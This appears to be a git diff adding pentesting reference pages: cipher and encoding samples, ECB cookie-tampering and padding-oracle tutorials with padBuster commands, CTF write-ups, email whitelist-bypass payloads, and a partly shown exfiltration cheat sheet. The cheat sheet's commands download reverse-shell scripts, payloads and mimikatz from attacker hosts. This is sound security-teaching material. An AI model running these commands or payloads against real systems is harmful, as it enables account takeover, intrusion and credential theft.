+M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(
+M3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/
+F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$`
+`
+end
+```
+
+* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
+
+### XXEncoder
+
+```text
+begin 644 webutils_pl
+hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236
+5Hol-G2xAEE++
+end
+```
+
+* [www.webutils.pl/index.php?idx=xx](www.webutils.pl/index.php?idx=xx)
+
+### YEncoder
+
+```text
+=ybegin line=128 size=28 name=webutils_pl
+ryvkryvkryvkryvkryvkryvkryvk
+=yend size=28 crc32=35834c86
+```
+
+* [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)
+
+### BinHex
+
+```text
+(This file must be converted with BinHex 4.0)
+:#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p
+-38K26%'d9J!!:
+```
+
+* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
+
+### ASCII85
+
+```text
+<~85DoF85DoF85DoF85DoF85DoF85DoF~>
+```
+
+* [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85)
+
+### Dvorak keyboard
+
+```text
+drnajapajrna
+```
+
+* [https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard)
+
+### A1Z26
+
+Letters to their numerical value
+
+```text
+8 15 12 1 3 1 18 1 3 15 12 1
+```
+
+### Affine Cipher Encode
+
+Letter to num `(ax+b)%26` \(_a_ and _b_ are the keys and _x_ is the letter\) and the result back to letter
+
+```text
+krodfdudfrod
+```
+
+### Bacon Code
+
+Substitude each letter for 4 As or Bs \(or 1s and 0s\)
+
+```text
+00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000
+AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
+```
+
+### Runes
+
+![](../.gitbook/assets/runes.jpg)
+
+## Compression
+
+**Raw Deflate** and **Raw Inflate** \(you can find both in Cyberchef\) can compress and decompress data without headers.
+
+## Easy Crypto
+
+### XOR - Autosolver
+
+* [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
+
+### Bifid
+
+A keywork is needed
+
+```text
+fgaargaamnlunesuneoa
+```
+
+### Vigenere
+
+A keywork is needed
+
+```text
+wodsyoidrods
+```
+
+* [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)
+* [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
+* [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
+
+## Strong Crypto
+
+### Fernet
+
+2 base64 strings \(token and key\)
+
+```text
+Token:
+gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q==
+
+Key:
+-s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI=
+```
+
+* [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
+
+### Samir Secret Sharing
+
+A secret is splitted in X parts and to recover it you need Y parts \(_Y &lt;=X_\).
+
+```text
+8019f8fa5879aa3e07858d08308dc1a8b45
+80223035713295bddf0b0bd1b10a5340b89
+803bc8cf294b3f83d88e86d9818792e80cd
+```
+
+{% embed url="http://christian.gen.co/secrets/" %}
+
+### OpenSSL brute-force
+
+* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
+* [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF)
+
+## Tools
+
+* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
+* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
+* [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
+
diff --git a/crypto/electronic-code-book-ecb.md b/crypto/electronic-code-book-ecb.md
new file mode 100644
index 00000000..aa6a1a92
--- /dev/null
+++ b/crypto/electronic-code-book-ecb.md
@@ -0,0 +1,226 @@
+---
+description: 'https://pentesterlab.com/'
+---
+
+# Electronic Code Book \(ECB\)
+
+**Post from:** [**https://pentesterlab.com/**](https://pentesterlab.com/)\*\*\*\*
+
+## ECB
+
+ECB is an encryption mode in which the message is splitted into blocks of X bytes length and each block is encrypted separetely using a key.
+
+The following schema \(source: [Wikipedia](http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)\) explains this method:
+
+![License](https://assets.pentesterlab.com/ecb/ECB_encryption.png)
+
+You can check the [recent XKCD on the Adobe's password leak](http://xkcd.com/1286/) to get an humoristic idea of the problems tied to ECB.
+
+During the decryption, the reverse operation is used. Using ECB has multiple security implications:
+
+* Blocks from encrypted message can be removed without disturbing the decryption process.
+* Blocks from encrypted message can be moved around without disturbing the decryption process.
+
+In this exercise, we will see how we can exploit these two weaknesses.
+
+## Detection of the vulnerability
+
+In this exercise, you can register an account and log in with this account \(to make things easier, you get automatically logged in when you register\).
+
+If you create an account and log in two times with this account, you can see that the cookie sent by the application didn't change.If you log in many times and always get the same cookie, there is probably something wrong in the application. The cookie sent back should be unique each time you log in. If the cookie is always the same, it will probably always be valid and there won't be anyway to invalidate it.
+
+If we look at the cookie, we can see that it seems uri-encoded and base64-encoded:
+
+![License](https://assets.pentesterlab.com/ecb/cookie.png)
+
+The 2 equals sign encoded as `%3d%3d` are a good indicator of base64-encoded string.
+
+We can decode it using the following ruby code:
+
+```text
+% irb
+> require 'base64' ; require 'uri'
+ => true
+> Base64.decode64(URI.decode("OR9hcp18%2BC1bChK10NlRRg%3d%3d"))
+ => "9\x1Far\x9D|\xF8-[\n\x12\xB5\xD0\xD9QF"
+```
+
+Or by decoding the URI to a string manually and use the base64 command:
+
+```text
+% echo "OR9hcp18+C1bChK10NlRRg==" | base64 -D | hexdump -C
+0000000 39 1f 61 72 9d 7c f8 2d 5b 0a 12 b5 d0 d9 51 46  |9.ar.|.-[.....QF|
+0000010
+```
+
+On osX, the command `base64 -D` replaces `base64 -d`
+
+In both cases, we can see that the information seems to be encrypted.
+
+First, we can start by creating two accounts `test1` and `test2` with the same password: `password` and compare the cookies sent by the application. We get the following cookies \(after URI-decoding\):
+
+| Account: | test1 | test2 |
+| :--- | :--- | :--- |
+| Cookie: | vHMQ+Nq9C3MHT8ZkGeMr4w== | Mh+JMH1OMhcHT8ZkGeMr4w== |
+
+If we base64-decode both cookies, we get the following strings:
+
+| Account: | test1 | test2 |
+| :--- | :--- | :--- |
+| Decoded cookie: | \xBCs\x10\xF8\xDA\xBD\vs**\aO\xC6d\x19\xE3+\xE3** | 2\x1F\x890}N2\x17**\aO\xC6d\x19\xE3+\xE3** |
+
+We can see that part of the decrypted values look really similar.
+
+Now we can try to create a user with an arbitrary long username and password. For example, a username composed of 20 `a` and a password composed of 20 `a`. By creating this user, we get the following cookie:
+
+```text
+> document.cookie
+"auth=GkzSM2vKHdcaTNIza8od1wS28inRHiC2GkzSM2vKHdcaTNIza8od1ys96EXmirn5"
+```
+
+If we decode this value, we get the following value:
+
+```text
+\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7\x04\xB6\xF2)\xD1\x1E \xB6\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7+=\xE8E\xE6\x8A\xB9\xF9
+```
+
+We can see that the following pattern \(composed of 8 bytes\): **`\x1AL\xD23k\xCA\x1D\xD7`** comes back multiple times:
+
+```text
+\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7\x04\xB6\xF2)\xD1\x1E \xB6\x1AL\xD23k\xCA\x1D\xD7\x1AL\xD23k\xCA\x1D\xD7+=\xE8E\xE6\x8A\xB9\xF9
+```
+
+Based on the size of the pattern, we can infer that the ECB encryption uses a block size of 8 bytes.This example is using a weak encryption mechanism and it's likely that real life examples will use bigger block size.
+
+The decoded information also shows us that the username and password are not directly concatenated and that a delimiter is added \(since one of the block in the middle is different from the previous one\).
+
+We can think of the encrypted stream has one of the two following possibilities:
+
+* The stream contains the username, a delimiter and the password:
+
+![Schema username password](https://assets.pentesterlab.com/ecb/del_u_p.png)
+
+* The stream contains the password, a delimiter and the username:
+
+![Schema password username](https://assets.pentesterlab.com/ecb/del_p_u.png)
+
+By creating another user with a long username and a short password, we can see that the following pattern is used: `username|delimiter|password`.
+
+Now let's try to find the size of the delimiter, if we play with different size of username and password we get the following results:
+
+| Username length: | Password length: | Username+Password length: | Cookie's length \(after decoding\): |
+| :--- | :--- | :--- | :--- |
+| 2 | 3 | 5 | 8 |
+| 3 | 3 | 6 | 8 |
+| 3 | 4 | 7 | 8 |
+| 4 | 4 | 8 | 16 |
+| 4 | 5 | 9 | 16 |
+
+We can see that the size of the decoded cookie goes from 8 to 16 bytes when the length of the Username+Password is greater than 7. We can infer from this value that the delimiter is a single byte since the encryption is done per block of 8 bytes.
+
+Another important thing is to see what part of the encrypted stream is used by the application when we send the cookie back. If we remove everything after the block corresponding to the delimiter, we can see that we are still authenticated. The password does not seem to be used when the cookie gets used by the application.
+
+We now know that we just need to get the correct `username|delimiter` to get authenticated within the application as `username`.If you can find what delimiter is used \(or brute force it\), you can try to create a user with a username that contains the delimiter \(for example the username "`admin:`"\). Using this method, you may be able to get logged in as `admin`. This web application prevents this type of attack.
+
+## Exploitation of the vulnerability
+
+### By removing information
+
+The easiest way to get `admin` access is to remove some of the encrypted data. We know that the application uses the following format:
+
+```text
+\[username\]:\[separator\]
+```
+
+and only uses the `username` when the cookie is sent back to the application. We also know that each block of 8 bytes is completely independant \(ECB\). To exploit this issue, we can create a username that contains 8 characters followed by the word `admin`:
+
+```text
+aaaaaaaaadmin
+```
+
+And we will receive the cookie \(retrieved using the Javascript Console\):
+
+```text
+> document.cookie
+"auth=GkzSM2vKHdfgVmQuKXLregdPxmQZ4yvj"
+```
+
+This value will get decoded as:
+
+```text
+\x1AL\xD23k\xCA\x1D\xD7\xE0Vd.)r\xEBz\aO\xC6d\x19\xE3+\xE3
+```
+
+We can see the pattern `\x1AL\xD23k\xCA\x1D\xD7` detected previously with the username that contained 20 `a`.
+
+We can then remove the first 8 bytes of information and reencode our payload to get a new cookie:
+
+```text
+\xE0Vd.)r\xEBz\aO\xC6d\x19\xE3+\xE3
+```
+
+That will get encoded by the following ruby code:
+
+```text
+% irb
+> require 'cgi'; require 'base64'
+ => true
+> CGI.escape(Base64.strict_encode64("\xE0Vd.)r\xEBz\aO\xC6d\x19\xE3+\xE3"))
+ => "4FZkLily63oHT8ZkGeMr4w%3D%3D"
+```
+
+Once you modify the cookie:
+
+![Cookie tampering with JS console](https://assets.pentesterlab.com/ecb/cookiemod.png)
+
+And send this value back to the application \(by reloading the page\), you get logged in as `admin`:
+
+![License](https://assets.pentesterlab.com/ecb/admin.png)
+
+### By swapping blocks around
+
+A more complicated way to bypass this is to swap data around. We can make the assumption that the application will use an SQL query to retrieve information from the user based on his `username`. For some databases, when using the type of data `VARCHAR` \(as opposed to `BINARY` for example\), the following will give the same result:
+
+```text
+SELECT * FROM users WHERE username='admin';
+```
+
+```text
+SELECT * FROM users WHERE username='admin        ';
+```
+
+The spaces after the value `admin` are ignored during the string comparison. We will use this to play with the encrypted blocks.
+
+Our goal is to end up with the following encrypted data:
+
+```text
+ECB(admin   [separator]password)
+```
+
+We know that our separator is only composed of one byte. We can use this information to create the perfect `username` and `password`to be able to swap the blocks and get the correct forged value.
+
+We need to find a username and a password for which:
+
+* the password starts with `admin` to be used as the new username.
+* the encrypted password should be located at the start of a new block.
+* the `username+delimiter` length should be divisible by the block size \(from previous conditions\)
+
+By playing around, we can see that the following values work:
+
+* a `username` composed of `password` \(8 bytes\) followed by 7 spaces \(1 byte will be used by the delimiter\).
+* a `password` composed of `admin` followed by 3 spaces \(`8 - length("admin")`\).
+
+When creating this user, use a proxy to intercept the request and make sure your browser didn't remove the space characters.
+
+If you create correctly this user, the encrypted information will look like:![License](https://assets.pentesterlab.com/ecb/swap-b.png)
+
+Using some Ruby \(or even with Burp decoder\), you can swap the first 8 bytes with the last 8 bytes to get the following encrypted stream:![License](https://assets.pentesterlab.com/ecb/swap-a.png)
+
+Once you modify your cookie, and you reload the page, you should be logged in as `admin`:
+
+![License](https://assets.pentesterlab.com/ecb/admin.png)
+
+## Conclusion
+
+This exercise showed you how you can tamper encrypted information without decrypting them and use this behaviour to gain access to other accounts. It showed you that encryption can not be used as a replacement to signature and how it's possible to use ECB encryption to get control on the decrypted information. I hope you enjoyed learning with PentesterLab.
+
diff --git a/crypto/padding-oracle-priv.md b/crypto/padding-oracle-priv.md
new file mode 100644
index 00000000..8d553a5b
--- /dev/null
+++ b/crypto/padding-oracle-priv.md
@@ -0,0 +1,117 @@
+---
+description: 'https://pentesterlab.com/'
+---
+
+# Padding Oracle
+
+**Post from** [**https://pentesterlab.com/**](https://pentesterlab.com/)\*\*\*\*
+
+## Cipher Block Chaining
+
+CBC is an encryption mode in which the message is split into blocks of X bytes length and each block is XORed with the previous encrypted block. The result is then encrypted.
+
+The following schema \(source: [Wikipedia](http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)\) explains this method:![CBC encryption](https://assets.pentesterlab.com/padding_oracle/CBC_encryption.png)
+
+During the decryption, the reverse operation is used. The encrypted data is split in block of X bytes. Then the block is decrypted and XORed with the previous encrypted block to get the cleartext. The following schema \(source: [Wikipedia](http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation)\) highlights this behavior:
+
+![CBC decryption](https://assets.pentesterlab.com/padding_oracle/CBC_decryption.png)
+
+Since the first block does not have a previous block, an initialization vector \(IV\) is used.
+
+## Padding
+
+As we saw, the encryption is done by blocks of fixed size. To ensure that the cleartext exactly fit in one or multiple blocks, padding is often used. Padding can be done in multiple ways. A common way is to use PKCS7. With PKCS7, the padding will be composed of the same number: the number of bytes missing. For example, if the cleartext is missing 2 bytes, the padding will be `\x02\x02`.
+
+Let's look at more examples with a 2 blocks:
+
+| Block \#0 | Block \#1 |  |  |  |  |  |  |  |  |  |  |  |  |  |  |
+| :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- |
+| byte \#0 | byte \#1 | byte \#2 | byte \#3 | byte \#4 | byte \#5 | byte \#6 | byte \#7 | byte \#0 | byte \#1 | byte \#2 | byte \#3 | byte \#4 | byte \#5 | byte \#6 | byte \#7 |
+| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | 'R' | 'E' | 'T' | '1' | '2' | '3' | **0x02** | **0x02** |
+| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | 'R' | 'E' | 'T' | '1' | '2' | **0x03** | **0x03** | **0x03** |
+| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | 'R' | 'E' | 'T' | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** |
+| 'S' | 'U' | 'P' | 'E' | 'R' | 'S' | 'E' | 'C' | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** |
+
+## Padding Oracle
+
+When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, **if** an **invalid** **padding** triggers a detectable **behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack** of **results**, or a **slower response**.
+
+If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**.
+
+### How to exploit
+
+You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability.
+
+In order to test if the cookie of a site is vulnerable you could try: 
+
+```bash
+perl ./padBuster.pl http://10.10.181.45/index.php "Nl0OpaQYeGPMJeWSih2iiQ==" 8 -encoding 0 -cookies "auth=Nl0OpaQYeGPMJeWSih2iiQ=="
+```
+
+**Encoding 0** means that **base64** is used \(but others are available, check the help menu\).
+
+You could also **abuse** this **vulnerability** to **encrypt new data**. For example, imagine that the content of the cookie is "_user=MyUsername_", then you may change it to "_**user=administrator**_" and escalate privileges inside the application. You could also do it using `paduster`specifying the **-plaintext** parameter:
+
+```bash
+perl ./padBuster.pl http://10.10.181.45/index.php "Nl0OpaQYeGPMJeWSih2iiQ==" 8 -encoding 0 -cookies "auth=Nl0OpaQYeGPMJeWSih2iiQ==" -plaintext "user=administrator"
+```
+
+If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter.
+
+```bash
+perl ./padBuster.pl http://10.10.181.45/index.php "Nl0OpaQYeGPMJeWSih2iiQ==" 8 -encoding 0 -cookies "hcon=Nl0OpaQYeGPMJeWSih2iiQ==" -error "Invalid padding"
+```
+
+### The theory
+
+In **resume**, you can start decrypting the encrypted data by **guessing** the correct **values** that can be used to **create** all the **different paddings**. Then, the padding oracle attack will start **decrypting** bytes **from** the **end** to the start by **guessing** which will be the correct **value** that **creates a padding of 1, 2, 3, etc**.
+
+If we zoom in, we can see that the cleartext byte `C15` is just a XOR between the encrypted byte `E7` from the previous block, and byte `I15` which came out of the block decryption step:![CBC zoom in](https://assets.pentesterlab.com/padding_oracle/zoomin.png)
+
+This is also valid for all other bytes:
+
+* `C14 = I14 ^ E6`
+* `C13 = I13 ^ E5`
+* `C12 = I12 ^ E4`
+* ...
+
+Now if we modify `E7` and keep changing its value, we will keep getting an invalid padding. Since we need `C15` to be `\x01`. However, there is one value of `E7` that will give us a valid padding. Let's call it `E'7`. With `E'7`, we get a valid padding. And since we know we get a valid padding we know that `C'15` \(as in `C15` for `E'7`\) is `\x01`.
+
+`\x01 = I15 ^ E'7`
+
+The gives us:
+
+`I15 = \x01 ^ E'7`
+
+So we are able to compute `I15`.
+
+Since we know `I15`, we can now compute `C15`
+
+`C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
+
+Now that we have `C15`, we can move to brute-forcing `C14`. First we need to compute another `E7` \(let's call it `E''7`\) that gives us `C15 = \x02`. We need to do that since we want the padding to be `\x02\x02` now. It's really simple to compute using the property above and by replacing the value of `C15` we want \(`\x02`\) and `I15` we now know:
+
+`E''7 = \x02 ^ I15`
+
+After brute force `E6`, to find the value that gives us a valid padding `E''6`, we can re-use the formula:
+
+`C14 = I14 ^ E6`
+
+to get
+
+`I14 = \x02 ^ E''6`
+
+Once we get `I14`, we can compute `C14`:
+
+`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`
+
+Using this method, we can keep going until we get all the ciphertext decrypted.
+
+### Detection of the vulnerability
+
+To get started, you can register an account and log in with this account \(to make things easier, you get automatically logged in when you register\).
+
+If you create an account and log in two times with this account, you can see that the cookie sent by the application didn't change.If you log in many times and always get the same cookie, there is probably something wrong in the application. The cookie sent back should be unique each time you log in. If the cookie is always the same, it will probably always be valid and there won't be anyway to invalidate it.
+
+Now, if you try to modify the cookie, you can see that you get an error from the application.
+
diff --git a/crypto/rc4-encrypt-and-decrypt.md b/crypto/rc4-encrypt-and-decrypt.md
new file mode 100644
index 00000000..12991b9a
--- /dev/null
+++ b/crypto/rc4-encrypt-and-decrypt.md
@@ -0,0 +1,14 @@
+# RC4 - Encrypt&Decrypt
+
+If you can somehow encrypt a plaintext using a RC4**,** you can decrypt any content encrypted by that RC4\(using the same password\) just using the encryption function.
+
+If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
+
+{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
+
+{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
+
+\*\*\*\*
+
+
+
diff --git a/ctf-write-ups/README.md b/ctf-write-ups/README.md
new file mode 100644
index 00000000..702d829e
--- /dev/null
+++ b/ctf-write-ups/README.md
@@ -0,0 +1,2 @@
+# CTF Write-ups
+
diff --git a/ctf-write-ups/try-hack-me/README.md b/ctf-write-ups/try-hack-me/README.md
new file mode 100644
index 00000000..77d292c6
--- /dev/null
+++ b/ctf-write-ups/try-hack-me/README.md
@@ -0,0 +1,2 @@
+# Try Hack Me
+
diff --git a/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
new file mode 100644
index 00000000..a06b2c64
--- /dev/null
+++ b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
@@ -0,0 +1,42 @@
+# hc0n Christmas CTF - 2019
+
+![](../../.gitbook/assets/41d0cdc8d99a8a3de2758ccbdf637a21.jpeg)
+
+## Enumeration
+
+I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
+
+![](../../.gitbook/assets/image%20%2821%29.png)
+
+There are 2 ports open: 80 \(**HTTP**\) and 22 \(**SSH**\)
+
+In the web page you can **register new users**, and I noticed that **the length of the cookie depends on the length of the username** indicated:
+
+![](../../.gitbook/assets/image%20%28311%29.png)
+
+![](../../.gitbook/assets/image%20%28318%29.png)
+
+And if you change some **byte** of the **cookie** you get this error:
+
+![](../../.gitbook/assets/image%20%28109%29.png)
+
+With this information and[ **reading the padding oracle vulnerability**](../../crypto/padding-oracle-priv.md) I was able to exploit it:
+
+```bash
+perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"
+```
+
+![](../../.gitbook/assets/image%20%2853%29.png)
+
+![](../../.gitbook/assets/image%20%28173%29.png)
+
+**Set user admin:**
+
+```bash
+perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"
+```
+
+![](../../.gitbook/assets/image%20%28271%29.png)
+
+
+
diff --git a/ctf-write-ups/try-hack-me/pickle-rick.md b/ctf-write-ups/try-hack-me/pickle-rick.md
new file mode 100644
index 00000000..91f82baf
--- /dev/null
+++ b/ctf-write-ups/try-hack-me/pickle-rick.md
@@ -0,0 +1,62 @@
+# Pickle Rick
+
+![](../../.gitbook/assets/picklerick.gif)
+
+This machine was categorised as easy and it was pretty easy.
+
+## Enumeration
+
+I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
+
+![](../../.gitbook/assets/image%20%2861%29.png)
+
+In as you can see 2 ports are open: 80 \(**HTTP**\) and 22 \(**SSH**\)
+
+So, I launched legion to enumerate the HTTP service:
+
+![](../../.gitbook/assets/image%20%28140%29.png)
+
+Note that in the image you can see that `robots.txt` contains the string `Wubbalubbadubdub`
+
+After some seconds I reviewed what `disearch` has already discovered :
+
+![](../../.gitbook/assets/image%20%28132%29.png)
+
+![](../../.gitbook/assets/image%20%28105%29.png)
+
+And as you may see in the last image a **login** page was discovered.
+
+Checking the source code of the root page, a username is discovered: `R1ckRul3s`
+
+![](../../.gitbook/assets/image%20%28324%29.png)
+
+Therefore, you can login on the login page using the credentials `R1ckRul3s:Wubbalubbadubdub`
+
+## User
+
+Using those credentials you will access a portal where you can execute commands:
+
+![](../../.gitbook/assets/image%20%28196%29.png)
+
+Some commands like cat aren't allowed but you can read the first ingredient \(flag\) using for example grep:
+
+![](../../.gitbook/assets/image%20%28218%29.png)
+
+Then I used:
+
+![](../../.gitbook/assets/image%20%28171%29.png)
+
+To obtain a reverse shell:
+
+![](../../.gitbook/assets/image%20%2851%29.png)
+
+The **second ingredient** can be found in `/home/rick`
+
+![](../../.gitbook/assets/image%20%2857%29.png)
+
+## Root
+
+The user **www-data can execute anything as sudo**:
+
+![](../../.gitbook/assets/image%20%2884%29.png)
+
diff --git a/emails-vulns.md b/emails-vulns.md
new file mode 100644
index 00000000..ff90182e
--- /dev/null
+++ b/emails-vulns.md
@@ -0,0 +1,58 @@
+# Emails Vulnerabilities
+
+## Payloads
+
+### Ignored parts of an email
+
+The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
+
+* E.g. john.doe+intigriti@example.com → john.doe@example.com
+
+**Comments between parentheses \(\)** at the beginning or the end will also be ignored 
+
+* E.g. john.doe\(intigriti\)@example.com → john.doe@example.com
+
+### Whitelist bypass
+
+* inti\(;inti@inti.io;\)@whitelisted.com
+* inti@inti.io\(@whitelisted.com\)
+* inti+\(@whitelisted.com;\)@inti.io
+
+### IPs
+
+You can also use IPs as domain named between square brackets:
+
+* john.doe@\[127.0.0.1\]
+* john.doe@\[IPv6:2001:db8::1\]
+
+### Other vulns
+
+![](.gitbook/assets/image%20%28160%29.png)
+
+## Third party SSO
+
+### XSS
+
+Some services like **github** or **salesforce allows** you to create an **email address with XSS payloads on it**. If you can **use this providers to login on other services** and this services **aren't sanitising** correctly the email, you could cause **XSS**.
+
+### Account-Takeover
+
+If a **SSO service** allows you to **create an account without verifying the given email address** \(like **salesforce**\) and then you can use that account to **login in a different service** that **trusts** salesforce, you could access any account.  
+_Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._
+
+## Reply-To
+
+You can send an email using _**From: company.com**_ ****and _**Replay-To: attacker.com**_ and if any **automatic reply** is sent due to the email was sent **from** an **internal address** the **attacker** may be able to **receive** that **response**.
+
+## **References**
+
+* \*\*\*\*[**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)\*\*\*\*
+
+## Hard Bounce Rate
+
+Some applications like AWS have a **Hard Bounce Rate** \(in AWS is 10%\), that whenever is overloaded the email service is blocked.
+
+A **hard bounce** is an **email** that couldn’t be delivered for some permanent reasons. Maybe the **email’s** a fake address, maybe the **email** domain isn’t a real domain, or maybe the **email** recipient’s server won’t accept **emails**\) , that means from total of 1000 emails if 100 of them were fake or were invalid that caused all of them to bounce, **AWS SES** will block your service.
+
+So, if you are able to **send mails \(maybe invitations\) from the web application to any email address, you could provoke this block by sending hundreds of invitations to nonexistent users and domains: Email service DoS.**
+
diff --git a/exfiltration.md b/exfiltration.md
new file mode 100644
index 00000000..525e893a
--- /dev/null
+++ b/exfiltration.md
@@ -0,0 +1,292 @@
+# Exfiltration
+
+## Copy&Paste Base64
+
+#### Linux
+
+```bash
+base64 -w0 <file> #Encode file
+base64 -d file #Decode file
+```
+
+#### Windows
+
+```text
+certutil -encode payload.dll payload.b64
+certutil -decode payload.b64 payload.dll
+```
+
+## HTTP
+
+#### Linux
+
+```bash
+wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
+wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
+curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
+fetch 10.10.14.14:8000/shell.py #FreeBSD
+```
+
+#### Windows
+
+```bash
+certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
+bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
+
+#PS
+(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
+Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
+wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
+
+Import-Module BitsTransfer
+Start-BitsTransfer -Source $url -Destination $output
+#OR
+Start-BitsTransfer -Source $url -Destination $output -Asynchronous
+```
+
+### Upload files
+
+\*\*\*\*[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)\*\*\*\*
+
+## FTP
+
+### FTP server \(python\)
+
+```bash
+pip3 install pyftpdlib
+python3 -m pyftpdlib -p 21
+```
+
+### FTP server \(NodeJS\)
+
+```text
+sudo npm install -g ftp-srv --save
+ftp-srv ftp://0.0.0.0:9876 --root /tmp
+```
+
+### FTP server \(pure-ftp\)
+
+```bash
+apt-get update && apt-get install pure-ftp
+```
+
+```bash
+#Run the following script to configure the FTP server
+#!/bin/bash
+groupadd ftpgroup
+useradd -g ftpgroup -d /dev/null -s /etc ftpuser
+pure-pwd useradd fusr -u ftpuser -d /ftphome
+pure-pw mkdb
+cd /etc/pure-ftpd/auth/
+ln -s ../conf/PureDB 60pdb
+mkdir -p /ftphome
+chown -R ftpuser:ftpgroup /ftphome/
+/etc/init.d/pure-ftpd restart
+```
+
+### **Windows** client
+
+```bash
+#Work well with python. With pure-ftp use fusr:ftp
+echo open 10.11.0.41 21 > ftp.txt
+echo USER anonymous >> ftp.txt
+echo anonymous >> ftp.txt
+echo bin >> ftp.txt
+echo GET mimikatz.exe >> ftp.txt
+echo bye >> ftp.txt
+ftp -n -v -s:ftp.txt
+```
+
+## SMB
+
+Kali as server
+
+```bash
+kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
+kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
+#For new Win10 versions
+impacket-smbserver -smb2support -user test -password test test `pwd`
+```
+
+Or create a **smb** share **using samba**:
+
+```bash
+apt-get install samba
+mkdir /tmp/smb
+chmod 777 /tmp/smb
